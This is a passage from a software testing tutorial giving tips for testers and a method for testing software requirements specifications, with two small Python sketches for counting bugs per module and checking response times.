10) Programmers should not test their own code. As discussed in our previous post, basic unit testing of the developed application should be enough for developers to release the application to testers. But you (testers) should not force developers to release the product for testing; let them take their own time. Everyone from lead to manager knows when the module/update is released for testing, and they can estimate the testing time accordingly. This is a typical situation in an agile project environment.
11) Go beyond requirement testing. Test application for what it is not supposed to do.
12) While doing regression testing, use your previous bug graph (bug graph – number of bugs found against time for different modules). This module-wise bug graph can be useful to predict the most bug-prone parts of the application.
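The module-wise counts behind such a bug graph are easy to compute from a bug log. The sketch below uses made-up log entries of (module, date) pairs; a real version would read from your bug tracker's export.

```python
from collections import Counter

# Build module-wise bug counts (the data behind a "bug graph") from a
# simple bug log. The entries below are made-up examples.
bug_log = [
    ("login", "2023-01-05"), ("payment", "2023-01-06"),
    ("payment", "2023-01-09"), ("search", "2023-01-10"),
    ("payment", "2023-01-12"), ("login", "2023-01-15"),
]

bugs_per_module = Counter(module for module, _ in bug_log)

# Modules sorted by bug count: the top entries are the most probable
# places to focus regression testing on.
hotspots = bugs_per_module.most_common()
```

Here `hotspots` puts the 'payment' module first, which is where regression effort would be concentrated.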
13) Note down the new terms and concepts you learn while testing. Keep a text file open while testing an application and note down the testing progress and observations in it. Use these notes while preparing the final test release report. This good habit will help you provide a complete, unambiguous test report and release details.
14) Many times testers or developers make changes in the code base for the application under test. This is a required step in the development or testing environment to avoid execution of live transaction processing, as in banking projects. Note down all such code changes done for testing purposes, and at the time of the final release make sure you have removed all these changes from the final client-side deployment file resources.
15) Keep developers away from the test environment. This is a required step to detect any configuration changes missing from the release or deployment document. Sometimes developers make system or application configuration changes but forget to mention them in the deployment steps. If developers don't have access to the testing environment, they will not make any such changes accidentally on the test environment, and these missing steps can be caught in the right place.
16) It's a good practice to involve testers right from the software requirement and design phases. This way testers can gain knowledge of application dependencies, resulting in detailed test coverage. If you are not being asked to be part of this development cycle, then request your lead or manager to involve your testing team in all decision-making processes or meetings.
17) Testing teams should share best testing practices, experience with other teams in
their organization.
18) Increase your conversations with developers to know more about the product. Whenever possible, communicate face-to-face to resolve disputes quickly and to avoid any misunderstandings. But once you understand the requirement or resolve a dispute, make sure to confirm it over a written communication channel such as email. Do not keep anything purely verbal.
19) Don't run out of time for high-priority testing tasks. Prioritize your testing work from high to low priority and plan your work accordingly. Analyze all associated risks to prioritize your work.
20) Write clear, descriptive, unambiguous bug reports. Do not only describe the bug symptoms; also provide the effect of the bug and all possible solutions.
Don't forget that testing is a creative and challenging task. How you handle this challenge ultimately depends on your skill and experience.

Over to you:
Sharing your own testing experience, tips or testing secrets in comments below will
definitely make this article more interesting and helpful!!

How to test a software requirements specification (SRS)?
Do you know that most of the bugs in software are due to incomplete or inaccurate functional requirements? The software code, no matter how well it's written, can't do anything right if there are ambiguities in the requirements.
It's better to catch requirement ambiguities and fix them early in the development life cycle. The cost of fixing a bug after the completion of development or after product release is too high. So it's important to perform requirement analysis and catch these incorrect requirements before the design specification and project implementation phases of the SDLC.

How to measure functional software requirement specification (SRS) documents?


Well, we need to define some standard tests to measure the requirements. Once each
requirement is passed through these tests you can evaluate and freeze the functional
requirements.
Let's take an example. You are working on a web-based application. The requirement is as follows:
"The web application should be able to serve user queries as early as possible."
How will you freeze the requirement in this case? What will be your requirement satisfaction criteria? To get the answer, ask the stakeholders this question: how much response time is acceptable to you?
If they say they will accept a response within 2 seconds, then this is your requirement measure. Freeze this requirement and carry out the same procedure for the next requirement.
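Once the threshold is frozen, the measure can be checked mechanically. The sketch below times a single request callable against the agreed 2-second limit; the threshold comes from the stakeholders' answer above, and the simulated action stands in for a real HTTP request.

```python
import time

# Check a response against an agreed time threshold (here, 2 seconds,
# per the stakeholders' answer). The callable stands in for a real request.

def measure_response(action, threshold_s: float = 2.0):
    """Time one request callable; return (elapsed_seconds, passed)."""
    start = time.monotonic()
    action()
    elapsed = time.monotonic() - start
    return elapsed, elapsed <= threshold_s

# A simulated request taking ~0.1 s stands in for the real call,
# e.g. action=lambda: urllib.request.urlopen(url).read().
elapsed, ok = measure_response(lambda: time.sleep(0.1))
assert ok
```

Because the criterion is numeric, the same check can be repeated across builds to catch performance regressions against the frozen requirement.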
We just learned how to measure requirements and freeze them for the design, implementation and testing phases.
Now let's take another example. I was working on a web-based project. The client (stakeholders) specified the project requirements for the initial phase of project development. My manager circulated all the requirements in the team for review. When we started discussing these requirements, we were shocked! Everyone had his or her own conception of the requirements. We found a lot of ambiguities in the 'terms' specified in the requirement documents, which we later sent to the client for review/clarification.

The client had used many ambiguous terms with several different meanings, making it difficult to analyze the exact intent. The next version of the requirement document from the client was clear enough to freeze for the design phase.

From this example we learned “Requirements should be clear and consistent”


The next criterion for testing the requirements specification is "Discover missing requirements".
Many times project designers don't get a clear idea about specific modules and simply assume some requirements during the design phase. No requirement should be based on assumptions. Requirements should be complete, covering each and every aspect of the system under development.

Specifications should state both types of requirements, i.e. what the system should do and what it should not.
Generally, I use my own method to uncover unspecified requirements. When I read the software requirements specification document (SRS), I note down my own understanding of the requirements that are specified, plus the other requirements the SRS document is supposed to cover. This helps me ask questions about unspecified requirements, making them clearer.
To check requirements completeness, divide the requirements into three sections: 'must implement' requirements, requirements that are not specified but are 'assumed', and a third type, 'imagined' requirements. Check that all three types of requirements are addressed before the software design phase.

Check if the requirements are related to the project goal.


Sometimes stakeholders have their own areas of expertise, which they expect to see reflected in the system under development, without considering whether those requirements are relevant to the project in hand. Make sure to identify such requirements. Try to avoid irrelevant requirements in the first phase of the project development cycle. If that is not possible, ask the stakeholders: why do you want to implement this specific requirement? This will flesh out the particular requirement in detail, making it easier to design the system with future scope in mind.
But how do you decide whether a requirement is relevant or not? A simple answer: set the project goal and ask this question: will not implementing this requirement cause any problem in achieving our specified goal? If not, then it is an irrelevant requirement. Ask the stakeholders whether they really want to implement these types of requirements.
In short, the requirements specification (SRS) document should address the following:
Project functionality (what should be done and what should not)
Software and hardware interfaces and the user interface
System correctness, security and performance criteria
Implementation issues (risks), if any
Conclusion:
I have covered all aspects of requirement measurement. To be specific, I will summarize requirement testing in one sentence:
"Requirements should be clear and specific with no uncertainty, requirements should be measurable in terms of specific values, requirements should be testable with some evaluation criteria for each requirement, and requirements should be complete, without any contradictions."
Testing should start at the requirement phase to avoid further requirement-related bugs. Communicate frequently with your stakeholders to clarify all the requirements before starting project design and implementation.